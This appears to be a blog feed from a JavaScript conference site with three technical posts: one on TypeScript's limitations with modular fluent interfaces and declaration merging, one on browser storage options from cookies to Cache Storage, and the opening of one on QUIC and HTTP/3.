For most developers, ECMAScript modules are synonymous with the keywords import and export, but these don’t determine whether a piece of JavaScript is considered a module. For a JS engine, “ECMAScript module” is primarily a separate loading and operating mechanism for JavaScript programs in which

  1. Permanent strict mode applies without opt-out
  2. Programs, similar to scripts with the defer attribute, are loaded asynchronously and executed in browsers only at the DOMContentLoaded event
  3. import and export can be used

Thus, the following JavaScript program can be considered and treated as an ECMAScript module:

// hello.js
window.alert(“Hello World!”);

This mini-module contains no code that violates strict mode. It can handle contact with a fully processed DOM without crashing and can be easily loaded as a module by browsers:

<script type=“module” src=“hello.js”></script> 

The presence of the keywords import and export indicates that a JavaScript program is intended to be a module and is only executable in module mode. However, their absence doesn’t mean a program can’t be a module. In most cases, using import and/or export in modules makes sense, but not always: For example, if you want to activate a global polyfill, you don’t have to export anything. Instead, you can directly modify the relevant global objects. This use case may seem a bit unusual (after all, who regularly writes new polyfills?), but the world might be a little better if this use case weren’t so rare.

Modularity vs. fluent interfaces

Zod is a popular and powerful data validation library for JavaScript and TypeScript. It offers a highly convenient, fluent interface for describing data schemas, validates data against those schemas, and, as a special treat, can derive TypeScript types from the schemas (Listing 29).

Listing 29: Zod in action

import { z } from "zod";

const User = z.object({
  name: z.string(),
  mail: z.string().email(),
});

User.parse({
  name: "Test",
  mail: "[email protected]",
}); // > OK, no error

type User = z.infer<typeof User>;
// > TS-Type { name: string, mail: string }

The fluent interface with the simple chaining of method calls makes Zod particularly attractive. However, this chaining comes at a price: the z object contains every schema validation feature of Zod at all times, even if, as in the example above, only the objectstring, and email functions are used. The result is that, when compiled and minified with esbuild, the 14 lines of code shown above turn into a bundle of over 50 kB. For frontend applications where loading performance is an issue, the use of Zod is therefore out of the question.

This doesn’t mean there is anything wrong with Zod. The inclusion of the entire library’s code in the bundle, even when only one feature is used, is an unavoidable result of its highly convenient API design. This isn’t an issue when used on the server side. For Zod to work, the z object must be a normal JavaScript object with all the features, which means that bundler-based tree-shaking dead code elimination can’t be applied. The Zod developers decided to trade a better API design for a larger bundle—perhaps because the “frontend” use case was not that important to them, or because they considered convenience and developer experience to be more important. And that’s perfectly fine.

For comparison, the self-proclaimed “<1-kB Zod alternative” Valibot uses a completely different API design to Zod to take up only a few bytes (Listing 30).

Listing 30: Valibot in action

import {
  type Output,
  parse,
  object,
  string,
  email,
} from "valibot";

const User = object({
  name: string(),
  mail: string([email()]),
});

parse(User, {
  name: "Test",
  mail: "[email protected]",
}); // > OK, no error

type User = Output<typeof User>;
// > TS-Type { name: string, mail: string }

We see the same feature set as Zod with just one key difference: the fluent interface is no longer supported. Chained conditions (e.g., “this must be a string and the string must be an email address”) are modeled by manually imported and manually concatenated functions. This makes module bundlers like esbuild tree shaking easy, but the API is no longer as convenient.

In other words, fluent interfaces are nice, but they don’t always align with the performance optimizations necessary for frontend performance. Or do they?

The Versatile Swiss Army Knife (in JavaScript)

A Zod-style fluent interface can be implemented in JavaScript as well as in TypeScript using a few object methods that return this (Listing 31).

Listing 31: Basal Fluent Interface

const fluent = {
  object() {
    return this;
  },
  string() {
    return this;
  },
  email() {
    return this;
  },
}

fluent.string().email(); // Runs!

Suppose we step away from the constraints of type safety and delve into pure JavaScript. In that case, we can construct the object provided by the fluent interface, rather than declaring it centrally (Listing 32).

Listing 32: Piece-wise fluent interface

const fluent = {};

fluent.object = function() {
  return this;
};

fluent.string = function() {
  return this;
};

fluent.email = function() {
  return this;
};

fluent.string().email(); // Success!

In JavaScript, there’s no reason not to split the piecemeal assembly into individual modules. We just need to ensure that there is some kind of singleton for the Fluent object, which could be implemented, for example, by a core module imported everywhere (Listing 33).

Listing 33: Modularized Fluent Interface

// Core Module "fluent.js"
const fluent = {};
export { fluent };

// Module "object.js"
import { fluent } from "./fluent.js";
fluent.object = function () {
  return this;
};

// Module "string.js"
import { fluent } from "./fluent.js";
fluent.string = function () {
  return this;
};

// Module "email.js"
import { fluent } from "./fluent.js";
fluent.email = function () {
  return this;
};

The core module fluent.js initializes an object that is imported and extended by all feature modules. This means that only explicitly imported features can be used (and take up kilobytes), but we retain a fluent interface comparable to Zod (Listing 34).

Listing 34: Modularized Fluent Interface in Action

// main.js
import { fluent } from “./fluent.js”;
import “./string.js”; // patches string into “fluent”
import “./email.js”; // patches email into “fluent”

fluent.string().email(); // Works!
fluent.object(); // Error: object.js not imported

This minimal implementation of the modular Fluent pattern is clearly just a demonstrator showing what could be possible in principle: modularity and method chaining peacefully united. Only few people write their own polyfill where modules are pure side effects that patch arbitrary objects. But why not? After all, we could have fluent interfaces and tree shaking. Admittedly, there is a small detail known as “TypeScript” that complicates matters.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Declaration merging, but unconditionally

TypeScript is no stranger to the established JavaScript practice of patching arbitrary objects. It’s an official part of the language via declaration merging. If we create two interface declarations with identical names, this isn’t considered a naming collision, but a distributed declaration (Listing 35).

Listing 35: Declaration Merging

interface Foo {
  a: number;
}

interface Foo {
  b: string;
}

declare let x: Foo;
// { a: number; b: string }

TypeScript uses this mechanism primarily to support extensions of string-based DOM APIs, such as document.createElement(). This function is known to be able to fabricate an instance of an appropriate type from an HTML tag (Listing 36).

Listing 36: document.createElement() in action

let a = document.createElement(“a”);
// a = HTMLAnchorElement
let t = document.createElement(“table”);
// t = HTMLTableElement
let y = document.createElement(“yolo”);
// y = HTMLElement (base type)

It’s true that document.createElement(), from which the HTML tag creates an instance of HTMLAnchorElement, considers the tag table to be a default for an HTMLTableElement. And, as of August 2024, no specified element < yolo > exists. But how does TypeScript know all this? The answer is simple: at the core of TypeScript’s DOM type definitions, there is a large interface declaration that maps HTML tags to subtypes of HTMLElement (Listing 37).

Listing 37: HTMLElementTagNameMap

interface HTMLElementTagNameMap {
  "a": HTMLAnchorElement;
  "abbr": HTMLElement;
  "address": HTMLElement;
  "area": HTMLAreaElement;
  "article": HTMLElement;
  "aside": HTMLElement;
  "audio": HTMLAudioElement;
  "b": HTMLElement;
  ...
}

The type definition of document.createElement() uses type-level programming to derive from this interface the type of instance the function returns for a given HTML tag – with the basic HTMLElement as a fallback level for unknown HTML tags. And what do we do when unknown HTML tags become known HTML tags through Web Components? We merge new fields into the interface.

Listing 38: Declaration merging for web components

export class MyElement extends HTMLElement {
  foo = 42;
}

window.customElements.define("my-el", MyElement);

declare global {
  interface HTMLElementTagNameMap {
    "my-el": MyElement;
  }
}

let el = document.createElement("my-el");
el.foo; // number - el is a MyElement

The class declaration or the call to customElements.define() tells the browser at runtime that a new HTML element with a matching tag now exists, while the global interface declaration informs the TypeScript compiler about this new element. It’s therefore possible to extend global objects and have TypeScript record them correctly, and it is not even particularly difficult.

What happens if we move the above web component into its own module in our TypeScript project, fail to import this module, and still call document.createElement(“my-el”) (Listing 39)?

Listing 39: Unconditional Declaration Merging

// Import disabled!
// import “./component”;

const el = document.createElement(“my-el”);
el.foo; // number - el is still a MyElement

The commented-out component remains completely unknown to the browser, while TypeScript still assumes that the affected HTML tag can be used. This happens because TypeScript types are considered on a per-package basis. If a global type declaration is part of an imported package, it’s considered to be in effect. At the individual module level, TypeScript can’t understand that specific imports are needed to implement the effect of the declared types at runtime.

What to do about the side effects of mix-in modules?

In principle, managing TypeScript cleanly requires a somewhat blunt perspective: since TypeScript considers types on a per-package rather than a per-module basis, we can convert relevant modules into (quasi-)packages. Depending on the build setup, this can require more or less effort. The main step is to create a new folder for our module packages in the project and to use the exclude option to remove it from the view of the main project’s tsconfig.json. The modules can now be moved to the folder hidden from the compiler, meaning that TypeScript doesn’t process any type declarations within them when the corresponding modules/packages are actually imported.

The tricky question now is what our project and build system will accept as a “package”. If we don’t run the TypeScript compiler tsc at all or only with the options emitOnly or emitDeclarationOnly (i.e. when the TypeScript compiler doesn’t have to output JavaScript, but at most d.ts files), we can activate the compiler option allowImportingTsExtensions. This allows us to directly import the .ts files from the module packages folder, and thus activate only those global declarations that are actually imported (Listing 40).

Listing 40: Conditional declaration merging through packages

// packages/foo/index.ts
declare global {
  interface Window {
    foo: number; // new: window.foo
  }
}
export {}; // Boilerplate, ignore!

// packages/bar/index.ts
declare global {
  interface Window {
    bar: string; // new: window.bar
  }
}
export {}; // Boilerplate, ignore!

// index.ts
import "./packages/foo/index.ts";
window.foo; // <- Imported, works!
window.bar; // <- Not imported, error!

If, on the other hand, we need the JavaScript output of tsc, it gets a bit more complicated. In this case, the compiler option allowImportingTsExtensions isn’t available and the module packages have to be upgraded to more or less “correct” packages, including their own package.json. Depending on how many such “packages” you want to end up with in your project, this additional effort can either remain manageable or escalate into something completely unacceptable.

Side effects of mix-in modules remain a blind spot of TypeScript because the types known to the TypeScript compiler are determined at the package level, not ECMAScript modules, due to its fundamental design. Any workaround we can come up with has major or minor drawbacks. We can either accept them, try to minimize their effects by adjusting our project or build set-up, or simply accept the blind spot. But is it really a problem if the type system thinks an API is available when it isn’t? For a module with a fluent Interface, definitely. For web components, maybe not. And for other use cases? It depends on the circumstances.

iJS Newsletter

Keep up with JavaScript’s latest news!

Conclusion: TypeScript isn’t perfect

TypeScript aims to describe JavaScript’s behavior using a static type system, and it does this far better than we might expect. Almost every bizarre behavior of JavaScript can be partially managed by the type checker, with true blind spots existing only in a few peripheral aspects. However, as we’ve seen in this article, these fringe aspects are not without practical relevance, and as TypeScript professionals, we need to acknowledge that TypeScript is not perfect.

So how do we deal with these blind spots in our projects? Personally, I’m a big fan of a pragmatic approach to using tools of all kinds. Tools like TypeScript are machines that we developers operate, not the other way around. When in doubt, I prefer to occasionally accept an any or a few data types that are 99% correct. If an API can be significantly improved through elaborate type juggling, it may justify spending hours in the type-level coding rabbit hole.

However, fighting against the fundamental limitations of TypeScript is rarely worth the effort. There is no prize for the smallest possible any number, no bonus for particularly complex type constructions, and no promotion for a function definition that is 0.1% more watertight. What matters is a functioning product, maintainable code, and efficiency in execution and development – always considering what is possible given the current circumstances and available tools.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>
Exploring the Power of Web Browser Storage https://javascript-conference.com/blog/web-browser-storage/ Wed, 25 Sep 2024 12:10:38 +0000 https://javascript-conference.com/?p=91610 In modern web development, understanding web browser storage options is essential for optimizing both performance and user experience. This comprehensive guide explores the most powerful client-side storage solutions, including cookies, LocalStorage, IndexedDB, and Session Storage, and how they can be leveraged to improve your web applications. We also dive into more advanced techniques like WebSQL, the File System Access API, and Cache Storage in combination with Service Workers for effective offline storage and data synchronization. Whether you’re aiming to enhance browser performance or provide a seamless offline experience, mastering these JavaScript storage solutions is a must for any web developer.

The post Exploring the Power of Web Browser Storage appeared first on International JavaScript Conference.

]]>
When considering how to store information for a website or web application, you might initially consider creating a web storage API to store data in a relational database such as MariaDB or a document database like MongoDB on a server. Yet, the browser offers numerous storage options that can be leveraged for various needs.

Understanding the different storage facilities inside modern browsers is crucial for web developers. By looking at their pros and cons, you can make smart choices for your next project. This will help you create efficient and effective web applications.

1. Cookies

Website cookies, or HTTP cookies, are tiny text files stored in a user’s web browser when they visit a web page. These cookies can contain information that helps the website remember the user data or their preferences and improve the browsing experience.

 

Cookies are commonly used for authentication and session management. When a user logs into a website, a cookie with their login information is created on the server and stored in the web browser. This allows the website to recognise the users and keep them logged in as different page loads.

 

In addition, cookies are often used for personalisation purposes. They can store user preferences, such as language settings or display preferences so that the website can provide a customised user experience.

Setting cookies

Setting cookies with JavaScript Code is somewhat cumbersome because it’s written as a string containing all the cookie’s attributes.

 

Example 1.1

Setting cookies with JavaScript Code

In example 1.1, a cookie is created and saved with the name Sandwich and the value Turkey separated by an equal sign. The string also contains the cookie’s path and expiration date.

 

By default, the path is the current path, the page’s location that creates the cookie. If that path is a website subfolder, like test.com/cookies, the cookie will only be available for pages that are descendants of that path. If you want the cookie to be available on the whole website, make sure you include the root path, as in the example.

 

The max-age attribute defines a cookie’s end date. You can provide a date using the expires attribute in GMT format, but giving a max-age in seconds is easier. In example 1.1, the cookie will be deleted after one year of storage. Omitting this attribute will turn this cookie into a session cookie, which means it will be deleted after closing the browser.

 

Cookies are accessible through the browser DevTools. In Safari and Firefox browsers, they are available on the Storage tab, and in Chrome and Edge, they are present on the browser tab. Be aware that users can also access the cookies this way and alter them at will. The same goes for all the storage options mentioned further in this article.

Deleting cookies

If needed, the cookie can be removed by setting the max-age to 0, as shown in example 1.2. It is matched on the name and path; the cookie’s value is irrelevant in this case.

 

Example 1.2

Deleting cookies with JavaScript Code

A shopping website can also use cookies to remember the user’s shopping cart items. A benefit of using a cookie is that it is automatically sent to the web servers on each request, giving it direct access to the data. I prefer to store the contents of a shopping cart in a database on the server side and only save a unique reference for that cart in either a cookie or local storage.

Cookie Store

Setting a cookie, as in example 1.1, is a synchronous action. This means that any subsequent JavaScript execution has to wait until it is finished. Interacting with a cookie is also impossible from within a Service Worker.

 

To solve both these problems and to overcome the tedious process of setting a cookie with a string, the Cookie Store is available in Chromium-based browsers, such as Chrome, Edge, and most common Android browsers.

Service Worker

A Service Worker is a JavaScript file that mediates between the browser and the server. It can intercept and alter each request and reply to it from the server. It runs in a separate thread so that it won’t slow down any script related to the website. It also doesn’t have access to the website’s Document Object Model (DOM) or any cookies set in the browser, except when created with the Cookie Store.

Setting cookies

Setting cookies with the Cookie Store is more straightforward, as shown in example 1.3.

 

Example 1.3

Setting cookies with the Cookie Store

This will create a session cookie named Favorite with the value Chocolate. Passing an object can set more options, like the expiration date (unfortunately, max-age is unavailable); see example 1.4.

 

Example 1.4

Setting cookies with the Cookie Store

Deleting cookies

Deleting cookies is easy; a separate method only requires the cookie name (example 1.5).

 

Example 1.5

Deleting cookies with the Cookie Store

GAIN INSIGHTS INTO THE DO'S & DON'TS

Web Architecture & Performance Track

2. Web Storage

Web Storage is a mechanism for storing data as short—or long-term key-value pairs. Since the keys and values are always strings, objects and arrays must be converted, as shown in examples 2.1 and 2.2.

 

Example 2.1: converting objects

Web storage - Converting objects

Example 2.2: converting arrays

Web storage - Converting arrays

Local Storage

The data stored in Local Storage is not bound to a session (tab or window) and will persist and be available on the next visit. However, data saved in a “private browsing” or “incognito” session will be deleted afterwards.

 

Web Storage provides straightforward methods to store, retrieve and delete data.

 

Example 2.3

Store data in Local storage

A practical example is used on the website cfp.watch, where favourites are stored in Local Storage. Next time the user visits the website (with the same browser), these favourites will be available again.

Session Storage

Localstorage and sessionstorage works the same with one big exception: stored data will be cleared when tab or browser is closed.

 

The available methods are similar.

Session storage

Session Storage can store temporary data or state for a web application when you’re not using a state management library or frameworks like Redux or Pinia.

3. WebSQL

WebSQL was an attempt to bring SQLite to the browser to provide a robust way of storing and querying data. However, not all browser vendors were convinced, and Mozilla didn’t even attempt to implement it in their Firefox browser.

 

Another reason it wasn’t well adopted was probably the horrible API for writing queries with callbacks, as shown in example 3.1.

 

Example 3.1

WebSQL

Support for WebSQL is only available in older versions of the major browsers and some browsers on Android.

4. IndexedDB

IndexedDB has more or less replaced WebSQL but as a NoSQL database.

 

IndexedDB tables are referred to as object stores, and they support transactions and indexes. Like Web Storage, keys are stored as strings, but the value can be anything from strings to objects, arrays, or even binary data.

 

Example 4.1

IndexedDB

By calling the open method, a specific database (first parameter) will be opened or created if that database doesn’t exist yet. The second parameter of this method is the database’s version. When this version is higher than the current version (including non-existent), it will trigger the onupgradeneeded event, as shown in example 4.2.

 

Example 4.2

open method Indexed DB

In this event, actions depending on the version can be performed, like creating tables/object stores, indexes or inserting data.

 

IndexedDB will fire an on success event when everything went right and an on error event in case of errors, including the specific error.

 

Example 4.3

IndexedDB

After successfully opening the database, you can start a transaction to store data, for instance. Transactions are especially useful when multiple actions are performed, and none are allowed to fail. A transaction will ensure that all actions are reverted in case of a failure.

iJS Newsletter

Keep up with JavaScript’s latest news!

idb

While the syntax for using IndexedDB is much better than for WebSQL, there is still room for improvement. Which is why Jake Archibald, formerly from Google, wrote a library called idb. It uses promises instead of events, enabling developers to use async/await. It also provides shortcuts for common transactions like getAll, put, and delete.

 

Example 4.4 shows a shorter and easier implementation of examples 4.1 through 4.3 with the idb library.

 

Example 4.4

shorter and easier implementation

Data Synchronization

IndexedDB is an excellent solution for ensuring that data is always available for users, even offline or with a lousy internet connection. On startup, data from the server can be synced to IndexedDB for faster response, and when there is an active internet connection, added or changed data can be sent back to the server.

 

Examples 4.5 through 4.7 show a rudimentary implementation of this using a Web Worker. A Web Worker is similar to a Service Worker, so it runs in a separate thread, not blocking the website but not intercepting any network requests.

 

Example 4.5

rudimentary implementation using a Web Worker

utils.js has shared methods to open or create the database and save data.

 

Example 4.6

rudimentary implementation using a Web Worker

worker.js imports the idb library and helper methods of utils.js.

 

It will listen to messages sent to it and call the method *checkNetworkState * when the message equals CheckNetworkState. This method will check every 3 seconds whether the user agent is online. If so, it will attempt to update the server (in this case, a local mock server) by sending a post request (method syncRecords) for every record where synced is false. When successful, the record will be updated and synced will be set to true.

GAIN INSIGHTS INTO THE DO'S & DON'TS

Web Architecture & Performance Track

 

Example 4.7

rudimentary implementation using a Web Worker

script.js will instantiate a new worker at the DOMContentLoaded event and post a message to it to start the sync process to the server.

 

The DOMContentLoaded event fires when the HTML document has been completely parsed and all deferred scripts have been downloaded and executed.

5. File System Access API

The File System Access API enables developers to interact with users’ file system. Two prominent examples of web applications that use this are Adobe Photoshop Online and Visual Studio Code.

 

Reading and writing files is pretty straightforward using file pickers with options to, for instance, set the file type, folder, suggested file name or allowed extensions.

 

Example 5.1

The File System Access API

Reading a file starts with acquiring a file handle through the file picker, actually getting the file and reading the contents.

 

Example 5.2

The File System Access API

Saving a file also requires a file handle from the file picker to create and write a file.

 

In example 4.4, a grocery list IndexedDB object store was created, and 1 item was added. With the File System Access API, it’s now possible to export this to a text file, as shown in examples 5.3 through 5.5.

 

Example 5.3

The File System Access API

Example 5.4

The File System Access API

Example 5.5: contents of file

File Contents

 

The File System Access API is still experimental and is currently only supported by Chromium-based browsers on the desktop. Its predecessor is the File API.

File API

The File API uses the Origin Private File System (OPFS), a virtual drive within the browser’s sandbox that does not have access to the actual file system.

 

Files can only be read and must be provided to the browser using input type=”file” or via drag and drop.

 

Example 5.4 shows how to add a listener to a file input, read the file, and display it.

 

Example 5.4

The File System API

6. AppCache

AppCache, short for Application Cache, was designed to enable web applications to cache resources on the user’s computer. It aimed to make web apps available offline and improve load times by storing assets like HTML files, CSS, JavaScript, and images locally.

 

The way to do that was to create a manifest file, usually named offline.appcache, which contained all the information, as shown in example 6.1.

 

Example 6.1

AppCache, create a manifest file

The first line had to be CACHE MANIFEST and, in this case, is followed by a version number of the manifest as a comment.

 

The following lines show the files that the browser needs to cache. This could even include a remote JavaScript library, for instance.

 

Files that should never be cached need to be placed after NETWORK:, meaning they should always be retrieved from the server.

 

Example 6.2

AppCache, create a manifest file

Application Cache was enabled by adding a manifest attribute to the html tag.

Despite its initial promise, AppCache had several issues:

 

  • Files were only cached if all files in the manifest were available
  • The HTML file that has the manifest was cached as well
  • Cached files were always served from appcache; there was no way to get the files from the server instead
  • HTML updates required an updated manifest; a version number change (as in the comment mentioned before) was enough

 

For these reasons, and probably more, the Application Cache was depreciated and replaced by Cache Storage in combination with Service Workers. Some Android browsers still support AppCache, but continued use of it is not recommended.

iJS Newsletter

Keep up with JavaScript’s latest news!

7. Cache Storage

Cache Storage, part of the Service Workers API, is designed to store HTTP request/response pairs. It is particularly useful for enabling web applications to work offline and improving load performance.

 

Other key features that can be achieved with Cache Storage and Service Workers are:

  • Network Resilience: In situations with poor network conditions, the Cache Storage can serve as a fallback, delivering cached content when network requests fail.
  • Resource Versioning: Cache Storage supports versioning of cached assets. Developers can cache new versions of files and clear out old versions, ensuring users always have access to the latest content.
  • Custom Offline Pages: Developers can use Cache Storage to provide custom offline fallback pages. Instead of showing generic browser offline messages, applications can display branded pages, guides on using the app offline, or cached content.
  • Pre-caching: Cache Storage allows for pre-caching assets during the service worker installation. This ensures that all essential resources are cached before the user even navigates to a particular part of the site, enhancing the initial load performance.
  • API Caching: The Cache API can store responses for frequently requested data for web applications that rely heavily on API calls. This reduces the need for repetitive network requests, saves bandwidth, and improves responsiveness.

 

Caching data starts with creating, registering, and activating a Service Worker, as shown in examples 7.1 through 7.3.

 

Example. 7.1: service-worker.js

Cache Storage, part of the Service Workers API

Example 7.2: index.html

Cache Storage, part of the Service Workers API

Example 7.3: script.js

Cache Storage, part of the Service Workers API

Notice that the Service Worker JavaScript file is not loaded from the HTML file but within a JavaScript file. It’s also not necessary to check if navigator.serviceWorker is available in the browser because it’s supported in all modern browsers.

 

The next step can be to have an explicit list of assets (a static cache) that need to be saved and served from the Cache Storage.

 

In example 7.4, the name of the static cache and a list of files that need to be saved to it are declared. Next, in example 7.5, the install event is extended to check if a cache already exists. If not, it will be created, and all files will be added.

Example 7.4: service-worker.js

Cache Storage, part of the Service Workers API

Example 7.5: service-worker.js

Cache Storage, part of the Service Workers API

Just adding files to the cache isn’t very useful.

 

In example 7.6, the function getFromNetworkOrCache checks if the request (the full URL of the requested asset) is available in the Cache Storage. If it is, it retrieves and returns it directly.

 

If the asset is unavailable in the cache, it will fetch it from the network and serve it to the browser.

 

Example 7.6 service-worker.js

Cache Storage, part of the Service Workers API

To enable the functionality from this function, a new EventListener is added to the Service Worker file. Listening to the fetch event allows a Service Worker to catch the request and respond in any way it wants. In this case, it will respond with the result of getFromNetworkOrCache.

 

Example 7.7: service-worker.js

Cache Storage, part of the Service Workers API

It’s possible to cache other files as well to go beyond the static list of files. Those dynamic files should be stored in a separate cache. In example 7.8, an extra cache name is declared, and the getFromNetworkOrCache function has been extended.

 

Example 7.8: service-worker.js

Cache Storage, part of the Service Workers API

The function now saves a copy of the network response to the dynamic cache. This needs to be a copy of the response; otherwise, the Service Worker hasn’t got anything to return to the browser.

 

Next time a request with the same URL as a dynamically cached asset comes in, it can be served directly from the Cache Storage.

 

This particular cache strategy is just one of many possibilities. It can be suited as needed. Other common scenarios in the industry are:

 

  • Cache first; if network data is newer, replace the content
  • Network first; if it fails or takes too long, serve from the cache
  • Only serve static assets from cache and API calls from the network

8. Final words

Browser Storage is very powerful and versatile, and like everything in programming, the answer to the question “What should I use?” is “It depends.” There is no silver bullet that covers all your needs in every project. All the options have their pros and cons, and you should really think and think again about which one best suits your needs.

A repository with the mentioned storage possibilities is available at Github. It includes a client and server application you can run on your machine to try it out.

The post Exploring the Power of Web Browser Storage appeared first on International JavaScript Conference.

]]>
QUIC and HTTP/3: The Next Step in Web Performance https://javascript-conference.com/blog/quic-and-http-3-the-next-step-in-web-performance/ Tue, 30 Jul 2024 10:00:09 +0000 https://javascript-conference.com/?p=91210 Over the years, I've been involved with deploying web sites for many years, and also in pentests of many sites where I see lots of misconfiguration. Throughout this journey, I've witnessed firsthand the significant impact that protocol updates can have. The introduction of HTTP/2 fundamentally altered how we approach web service delivery, prioritizing efficiency and speed. Now, HTTP/3 is poised to do the same, ushering in a new era of web performance and potentially even security.

The post QUIC and HTTP/3: The Next Step in Web Performance appeared first on International JavaScript Conference.

]]>
How did we get here?

Since the invention of the web in 1991, we’ve seen steady progress in the capabilities of the fundamental building blocks of the web: HTTP, HTML, and URLs.

  • HTTP/0.9: 1991, RFC
    • GET only, HTML only
  • HTTP/1.0: 1996, RFC1945
    • POST and other verbs, MIME
  • HTTP/1.1: 1997, RFC2068,2616
    • Keepalive, pipelining, host header, updated in 2014
  • HTTP/2: 2015, RFC7540
    • SPDY, binary protocol, multiplexed streams
  • HTTP/3: 2022, RFC9114

What did HTTP/2 change?

Binary protocol

Switching to a binary protocol represented a major shift in HTTP’s architecture, and made several other options possible. This enhanced protocol was initially available in the form of “SPDY”, and was implemented in several browsers and servers as an experimental extension that eventually evolved into HTTP/2.

Header compression

Text-based protocols are not good for operations like compression and encryption, and the binary protocol allowed HTTP to enable compression of HTTP headers, not just the body.

Multiplexing

HTTP initially tried to improve the performance of parallel response delivery by using multiple TCP connections (defaulting to six per domain in most browsers), but this also increased memory consumption and latency as each connection had to do a complete TCP and TLS handshake – this overhead is clearly visible in browser development tools. Multiplexing allowed multiple resources to be transferred over the same TCP connection at the same time. This was a step up from the pipelining and keepalive introduced in HTTP/1.1 as it allowed dynamic rescheduling of resource delivery, allowing for example an important, but small, JSON response to sneak past a bigger, but less important image download, even if it was requested later.

HTTP initially attempted to improve performance for parallel response delivery by allowing multiple TCP connections (typically defaulting to six per domain in most browsers). However, this approach also increased memory consumption and latency due to each connection requiring a full TCP and TLS handshake. This overhead is readily apparent in browser developer tools. Multiplexing, introduced in HTTP/2, addressed this by enabling the transfer of multiple resources over a single TCP connection concurrently. This marked a significant improvement over the pipelining and keepalive mechanisms of HTTP/1.1. Multiplexing allows for dynamic rescheduling of resource delivery, enabling a critical but smaller JSON response to bypass a larger, less important image download, even if it was requested later.

Server push

Server push eliminated some round trips, for example, allowing multiple image or JavaScript sub-resources to be speculatively bundled in the response to a single request for an initial HTML document. Despite the promise of this, especially for mobile applications, this approach has not seen much use.

TLS-only

Despite a great deal of push-back from corporate interests, and that HTTP/2 was ultimately technically allowed to be delivered over unencrypted HTTP, browser makers rejected the entire premise, and all popular implementations only support HTTP/2 over HTTPS, raising the security floor for everyone.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

What problems does HTTP/2 have?

Head-of-line blocking

In early HTTP, every resource transfer required setting up a new TCP connection. HTTP 1.1 added pipelining and keepalive, allowing multiple requests and responses to use the same connection, removing a chunk of overhead. This was extended in HTTP/2 multiplexing, allowing dynamic reordering and reprioritisation of those resources within the connection, but both mechanisms are subject to the same problem. If the transfer at the front of the queue is held up, all of the responses queued up on that connection will stall, a phenomenon known as head-of-line blocking.

Network switching

An individual HTTP client connection is usually identified by the combination of its IP and port number. When a client transitions between network connections, for example moving from WiFi to mobile when leaving your house, both of these will change. This necessitates a completely new TCP connection with the new values, incurring overhead in setting up a new TCP and TLS connection from scratch. In situations when connections change rapidly, for example on a high speed train where connections are handed off between cell towers, or in high-density networks, for example, in a stadium, this can result in clients continuously reconnecting, with a dramatic impact on performance.

It’s stuck with TCP

HTTP/2 is built on TCP, and as such inherits all of its shortcomings. TCP was designed 50 years ago, and while it’s done remarkably well, it has some problems for the modern Internet that its creators did not foresee. However, we are stuck with it as it’s implementation is typically tied to the client and server operating systems that use it, so we can’t change it to suit one specific networking application, in this case HTTP.

TCP congestion control

One of the key things that can’t be changed easily in TCP is the congestion control algorithms that kick in when on busy networks. A great deal of research over the last 50 years has produced approaches to handling busy networks that are superior to what’s in TCP, and our inability to deploy them represents an ironic bottleneck of their own.

What are QUIC and HTTP/3?

QUIC (originally a backronym of “Quick UDP Internet Connections”, but that’s never used in practice) was started at Google in 2012. SPDY, that became HTTP/2, was a stepping stone to improvements in the low-level protocols that we rely on to deliver the web. Fundamentally, QUIC is a reimagining of TCP. Because we can’t replace TCP in every device in the world, it needed to be built on an existing lower-level protocol that provides a functional foundation, and a great fit for that is UDP, the user datagram protocol. UDP is much simpler than TCP, and lacks all kinds of features such as reliable delivery, connection identification, lost packet retransmission, packet reordering, and so on. The advantage of UDP is that it’s very fast and has very little overhead. UDP is most commonly used for protocols that don’t mind losing a bit of data here and there – you really don’t care that much about a few pixels glitching in the middle of a video call’s frame, or a little click in an audio call; it’s more important that the stream keeps going. It’s also used for DNS, in scenarios where you don’t care which DNS server responds, so long as one of them does.

At this point you’re probably thinking, “but we need reliable delivery for the web!”. That’s true, and it’s why we’ve used TCP to date. It provides the reliability guarantees we need, along with a bunch of other features we might not even use. But we can build reliable transports on top of unreliable ones – after all, this is exactly what TCP does on top of IP. So QUIC reimplements much of what TCP does, but on top of a UDP base and without all of TCP’s historical baggage, QUIC gives us free rein to rewrite things to better match how we want the web to work.

At the same time, Google was also looking at how encryption (specifically TLS) is used by HTTP. It’s all very ISO-network-diagram-friendly to use TLS as an independent layer, but if we look at the impact of this approach it becomes clear that TLS adds overhead in the form of latency on every request. So Google sought to integrate TLS (specifically TLS 1.3) directly into QUIC. Ultimately this allows what were previously three separate layers for TCP, TLS, and HTTP to be combined into a single layer with much lower overhead.

iJS Newsletter

Keep up with JavaScript’s latest news!

As terms, QUIC and HTTP/3 are often used interchangeably, and though QUIC can exist by itself, HTTP/3 can’t exist without QUIC. While QUIC can be used as a transport for other protocols (covered below), at this point it’s rare enough that it can be assumed that if you say QUIC, you also mean HTTP/3.

QUIC is a new protocol that’s not part of the OS’s standard networking stack, so it had to be implemented in “userland”, directly inside the applications that use it – browsers, HTTP clients, servers, etc. This does mean that there are multiple independent implementations, which is a recipe for more bugs and interoperability issues, but at the same time it also means that those bugs are easier to fix – application updates can be developed and rolled out much faster than those for an operating system.

If you’ve ever used mosh (mobile shell) as a remote admin tool instead of SSH, and appreciated the joys of reliable terminal sessions that never die, you’ve already experienced the advantages that a connectionless protocol built on UDP can bring, as that’s exactly what mosh does.

QUIC was eventually formalised into RFC9000, and HTTP/3 over QUIC in RFC9114.

Perhaps QUIC’s biggest secret is that you’re using it already. QUIC was implemented in most browsers in 2022, and CloudFlare reported that HTTP/3 use overtook HTTP/1.1 in that same year.

Head-of-line blocking (HOLB)

I mentioned HOLB earlier. This occurs in HTTP/2 because while we implemented multiplexing within a single TCP channel, and we can reorder and reprioritise the transfers that are occurring within it, it’s still subject to TCP’s own limitations because TCP knows nothing about HTTP. QUIC allows us to do away with that. UDP’s connectionless approach lets every transfer proceed independently; holding up one transfer has no effect on the others.

fig1: Head-of-line blocking

Network layers

The ISO 7-layer model has had much criticism because there are so many exceptions to its academic, isolated approach; HTTP/3 blurs the boundaries even more, for considerable gain.

In HTTP/1.1 we had 2 or 3 layers depending on whether we added TLS into the mix. HTTP/2 clarified that by enforcing a TLS layer. HTTP/3 mixes it all up again by dropping TCP in favour of UDP and combining the TLS and HTTP layers.

fig2: Network Layers

All-round improvements

